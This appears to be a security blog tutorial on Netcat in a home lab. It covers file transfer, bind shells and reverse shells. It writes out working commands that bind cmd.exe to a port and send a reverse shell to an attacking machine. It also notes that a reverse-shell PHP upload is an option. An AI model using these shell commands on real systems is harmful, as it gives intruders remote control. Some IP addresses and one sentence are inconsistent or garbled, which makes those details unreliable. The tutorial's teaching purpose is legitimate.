What is Netcat?
Netcat is considered the Swiss-army knife in information security. Basically, it's a power version of the classic Telnet program, capable of numerous additional tasks like chatting, file transfer, port scanning, banner grabbing, opening remote shells to even setting up a honey pot. An important feature of Netcat is that it can serve both as a client and a server (more detail later). In this blogpost, I'll practice some practical examples on the different usages of Netcat. I won't show you how to chat or do a port scan with Netcat because there are better tools available for these purposes. Good to know is that Netcat is available for both Linux and Windows.
1. File transfer with Netcat
Netcat is a great tool to send files over the network from one machine to another. In my lab, I am running two virtual machines (Kali Linux and Windows 7) on Virtualbox. Both are connected via a network bridge, so they are part of my internal network Both machines have Netcat installed.
On the Windows 7 machine, we created a simple text file that we want to send to the Kali Linux machine. The Windows 7 machine's IP adress is 192.168.0.249, Kali's IP adress is 126.96.36.199.
Step 1: send the file from the Windows VM to the Kali VM
nc 192.168.0.114 1234 < zero-day.txt
The command above is so simple that it requires no further explanation. We simply used the syntax nc target_ip port < file.txt
Step 2: receive the file on Kali linux
nc -lvp 1234 > zeroday.txt
- nc (run Netcat)
- -lvp 1234 (Listen Verbosely on Port 1234)
- > zeroday.txt (output > any data transferred to a file called zeroday.txt)
In the left screenshot we cat the file and you see it's indeed our text file from our Windows VM.
2. Reverse shell and remote shell with Netcat
Getting a reverse or remote shell is one of the key goal settings in offensive security. First it's important to understand the difference between a remote shell and a reverse shell.
A remote shell (or bind shell), is when you are binding a shell to a local port on one machine, and another machine connects to that port to remotely use the shell.
A reverse shell, is when you tell the shell to connect back to your machine which is listening for a connection ready for exploitation.
Choosing which one to use is depending on the network. Let's see the scenario below (source):
Dennis has a computer connected to the internet but within a NAT network, whilst Sophie is directly connected to the internet. Sophie's computer is directly accessible from the internet, but Dennis' system is not because it's behind a NAT.
If Dennis needs a shell on Sophie's computer, he can use a remote shell. He simply tries to connect with Sophie's system via Netcat whilst Sophie starts listening for a connection. Once connected she can bind her shell to the connection. A remote shell is established and Dennis can execute commands via this shell.
If Sophie wants a shell on Dennis' computer, she can not connect to his computer as his system is not publicly available. To overcome this, Dennis would need to bind his shell from his side to the network via Netcat and connect to Sophie, whilst Sophie should start listening for incoming connections. Once connected, Sophie has access to Dennis shell and can execute commands as well.
So basically, a Bind shell is you connecting from your machine to the shell, a reverse shell is the shell connecting to a listening service (Netcat) on your machine.
Example 1: get a remote shell via Netcat
Let's start simply by demonstrating how you can achieve a remote shell with Netcat from one machine to another. In this example, we are going to bind the shell on the Windows VM and connect to this shell via the Kali VM.
Windows VM side:
nc -lvp 1234 -e cmd.exe
- nc (run Netcat)
- -lvp 1234 (Listen Verbosely on Port 1234 (randomly chosen)
- -e cmd.exe (binds cmd.exe to Netcat)
Kali VM side:
nc 192.168.0.249 1234
- nc (run Netcat)
- 192.168.0.249 1234 (IP of the Windows VM + chosen port)
Note: if you would like to bind a Linux shell instead of a Windows shell to Netcat, use /bin/bash instead of cmd.exe
Example 2: get a reverse shell via Netcat
Next, we'll try getting a reverse shell. Instead of the attacking machine connecting to the target machine like in the first example, we are now going to ininiate bind the shell on the target machine to Netcat initiate a connection to the attacking machine. My Kali IP address in this exercise is 192.168.0.240
nc 192.168.0.240 1234 -e cmd.exe
ncat -lvp 1234
Real life scenario's
In offensive security, getting an reverse shell is a very big step in compromising a system. Unfortunately in real life scenario's, in most cases Netcat is not available and you have no immediate way to install or run Netcat. For any method to work, the attacker either needs to be able to execute arbitrary command on the system (your options are limited by the installed scripting languages on the target machine, such as Bash, Perl, Python, Powershell,..) or should be able to upload a file that can be executed by opening from the browser, by example a reverse-shell-PHP-script.